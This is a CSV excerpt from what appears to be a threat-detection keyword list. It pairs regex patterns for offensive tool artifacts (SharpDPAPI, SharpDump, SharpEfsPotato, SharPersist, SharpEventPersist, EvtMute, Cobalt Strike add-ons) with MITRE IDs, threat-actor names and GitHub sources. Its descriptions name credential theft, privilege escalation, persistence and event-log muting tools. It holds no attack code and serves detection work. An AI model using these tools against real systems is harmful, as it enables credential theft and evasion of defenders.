"*SharpDPAPI.exe*",".{0,1000}SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58926"
"*SharpDPAPI.exe*",".{0,1000}SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58927"
"*SharpDPAPI.Helpers.*",".{0,1000}SharpDPAPI\.Helpers\..{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58928"
"*SharpDPAPI.ps1*",".{0,1000}SharpDPAPI\.ps1.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58929"
"*SharpDPAPI.sln*",".{0,1000}SharpDPAPI\.sln.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58930"
"*SharpDPAPI.txt*",".{0,1000}SharpDPAPI\.txt.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58931"
"*sharpDPAPI_masterkeysToClipboard*",".{0,1000}sharpDPAPI_masterkeysToClipboard.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","58932"
"*SharpDPAPIMachine*.cs",".{0,1000}SharpDPAPIMachine.{0,1000}\.cs","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58933"
"*SharpDPAPI-master*",".{0,1000}SharpDPAPI\-master.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58934"
"*SharpDump.exe*",".{0,1000}SharpDump\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58935"
"*SharpDump.exe*",".{0,1000}SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58936"
"*SharpDump.exe*",".{0,1000}SharpDump\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58937"
"*SharpDXWebcam*",".{0,1000}SharpDXWebcam.{0,1000}","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","N/A","8","1","87","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z","58938"
"*sharpedrchecker*",".{0,1000}sharpedrchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58939"
"*SharpEDRChecker.exe*",".{0,1000}SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58940"
"*SharpEDRChecker.exe*",".{0,1000}SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","58941"
"*SharpEDRChecker.Program*",".{0,1000}SharpEDRChecker\.Program.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","58942"
"*SharpEDRChecker/releases*",".{0,1000}SharpEDRChecker\/releases.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","58943"
"*SharpEfsPotato by @bugch3ck*",".{0,1000}SharpEfsPotato\sby\s\@bugch3ck.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58944"
"*SharpEfsPotato by @bugch3ck*",".{0,1000}SharpEfsPotato\sby\s\@bugch3ck.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","58945"
"*SharpEfsPotato by @bugch3ck*",".{0,1000}SharpEfsPotato\sby\s\@bugch3ck.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58946"
"*SharpEfsPotato.cs*",".{0,1000}SharpEfsPotato\.cs.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","58947"
"*SharpEfsPotato.exe*",".{0,1000}SharpEfsPotato\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58948"
"*SharpEfsPotato.exe*",".{0,1000}SharpEfsPotato\.exe.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","58949"
"*SharpEfsPotato.exe*",".{0,1000}SharpEfsPotato\.exe.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58950"
"*SharpEfsPotato.sln*",".{0,1000}SharpEfsPotato\.sln.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","58951"
"*SharpEfsPotato-master*",".{0,1000}SharpEfsPotato\-master.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","58952"
"*SharpEfsTriggeEfs.exe*",".{0,1000}SharpEfsTriggeEfs\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","58953"
"*SharPersist -*",".{0,1000}SharPersist\s\-.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","58954"
"*SharPersist*",".{0,1000}SharPersist.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","58955"
"*SharPersist.exe*",".{0,1000}SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58956"
"*SharPersist.exe*",".{0,1000}SharPersist\.exe.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","58957"
"*SharpEventLoader*",".{0,1000}SharpEventLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58958"
"*SharpEventLoader*",".{0,1000}SharpEventLoader.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58959"
"*SharpEventLoader.exe*",".{0,1000}SharpEventLoader\.exe.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58960"
"*SharpEventPersist*",".{0,1000}SharpEventPersist.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58961"
"*SharpEventPersist*",".{0,1000}SharpEventPersist.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58962"
"*SharpEventPersist.exe*",".{0,1000}SharpEventPersist\.exe.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58963"
"*SharpEventPersist-main*",".{0,1000}SharpEventPersist\-main.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","58964"
"*SharpEvtMute.cs*",".{0,1000}SharpEvtMute\.cs.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","58965"
"*SharpEvtMute.exe*",".{0,1000}SharpEvtMute\.exe.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","58966"
"*SharpEvtMute.pdb*",".{0,1000}SharpEvtMute\.pdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","58967"
"*SharpEvtMute.sln*",".{0,1000}SharpEvtMute\.sln.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","58968"
"*SharpExcelibur*",".{0,1000}SharpExcelibur.{0,1000}","offensive_tool_keyword","cobaltstrike","Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpExcelibur","1","1","N/A","N/A","10","10","90","16","2024-09-30T14:28:20Z","2021-07-16T19:48:45Z","58969"
"*sharp-exec *",".{0,1000}sharp\-exec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58970"
"*SharpExec.exe*",".{0,1000}SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58971"
